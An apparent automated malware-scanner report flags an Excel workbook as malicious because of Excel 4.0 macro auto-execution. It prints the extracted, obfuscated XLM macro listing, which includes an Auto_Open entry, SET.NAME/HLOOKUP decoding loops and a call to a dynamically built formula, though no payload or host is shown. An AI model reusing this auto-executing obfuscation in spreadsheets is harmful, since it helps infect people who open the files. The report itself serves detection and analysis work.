MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6634 bytes |

SHA-256: e3b51926713d87d983ee4e480d06801c64534769c8c4abaffd7830840fcdf311

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - cRxK
' 0018 25 LABEL : Cell Value, String Constant - aSZpKGNNSE len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!E171
' 0018 26 LABEL : Cell Value, String Constant - BFyYkQunujm len=0
' 0018 27 LABEL : Cell Value, String Constant - BVLNRyMxfTSy len=0
' 0018 25 LABEL : Cell Value, String Constant - DGtRUNKkjQ len=0
' 0018 23 LABEL : Cell Value, String Constant - dONzErhc len=0
' 0018 24 LABEL : Cell Value, String Constant - dUjevmAxG len=0
' 0018 25 LABEL : Cell Value, String Constant - imerzvIQSV len=0
' 0018 27 LABEL : Cell Value, String Constant - JFKYeIPhodXI len=0
' 0018 24 LABEL : Cell Value, String Constant - kqjRVbUKq len=0
' 0018 25 LABEL : Cell Value, String Constant - nLSSipOPUZ len=0
' 0018 22 LABEL : Cell Value, String Constant - QINXRjH len=0
' 0018 27 LABEL : Cell Value, String Constant - qVZrexOKqivM len=0
' 0018 24 LABEL : Cell Value, String Constant - rnfXEpYWa len=0
' 0018 23 LABEL : Cell Value, String Constant - RYHnQPpG len=0
' 0018 20 LABEL : Cell Value, String Constant - stail len=0
' 0018 23 LABEL : Cell Value, String Constant - UeYSHfUX len=0
' 0018 22 LABEL : Cell Value, String Constant - uXHAMof len=0
' 0018 26 LABEL : Cell Value, String Constant - wJkpgwMNFsA len=0
' 0018 24 LABEL : Cell Value, String Constant - wkLzbccXX len=0
' 0018 24 LABEL : Cell Value, String Constant - YjQsnMUaA len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' cRxK,P48,"",-591.00000000000000000000
' cRxK,P49,"",-547.00000000000000000000
' cRxK,P50,"",488.00000000000000000000
' cRxK,P51,"",-992.00000000000000000000
' cRxK,P52,"",8.00000000000000000000
' cRxK,P53,"",661.00000000000000000000
' cRxK,E86,"SET.NAME("JFKYeIPhodXI",0+VALUE("0"))",""
' cRxK,E90,"SET.NAME("YjQsnMUaA",JFKYeIPhodXI)",""
' cRxK,E95,"SET.NAME("kqjRVbUKq",JFKYeIPhodXI)",""
' cRxK,E97,"SET.NAME("aSZpKGNNSE",COUNTA(RYHnQPpG))",""
' cRxK,E99,"SET.NAME("wJkpgwMNFsA",COUNTA(dONzErhc))",""
' cRxK,E103,[],""
' cRxK,E105,"SET.NAME("dUjevmAxG","")",""
' cRxK,E107,"YjQsnMUaA",""
' cRxK,E110,"SET.NAME("wkLzbccXX",HLOOKUP("*",RYHnQPpG,YjQsnMUaA,FALSE))",""
' cRxK,E112,"qVZrexOKqivM",""
' cRxK,E117,"SET.NAME("uXHAMof",JFKYeIPhodXI)",""
' cRxK,E122,[],""
' cRxK,E127,"uXHAMof",""
' cRxK,E132,"nLSSipOPUZ",""
' cRxK,E136,"DGtRUNKkjQ",""
' cRxK,E138,"QINXRjH",""
' cRxK,E143,"SET.NAME("stail",VALUE(HLOOKUP("*",dONzErhc,QINXRjH,FALSE)))",""
' cRxK,E146,"rnfXEpYWa",""
' cRxK,E148,"dUjevmAxG",""
' cRxK,E151,"kqjRVbUKq",""
' cRxK,E156,NEXT(),""
' cRxK,E159,"imerzvIQSV",""
' cRxK,E163,[],""
' cRxK,E165,"UeYSHfUX",""
' cRxK,E167,NEXT(),""
' cRxK,E169,RETURN(),""
' cRxK,E191,"SET.NAME("BFyYkQunujm",E86)",""
' cRxK,E195,"RYHnQPpG",""
' cRxK,E200,"SET.NAME("dONzErhc",R82C15)",""
' cRxK,E204,"SET.NAME("UeYSHfUX",211)",""
' cRxK,E208,"SET.NAME("BVLNRyMxfTSy",5)",""
' cRxK,E210,BFyYkQunujm(),""
' cRxK,E211,HALT(),""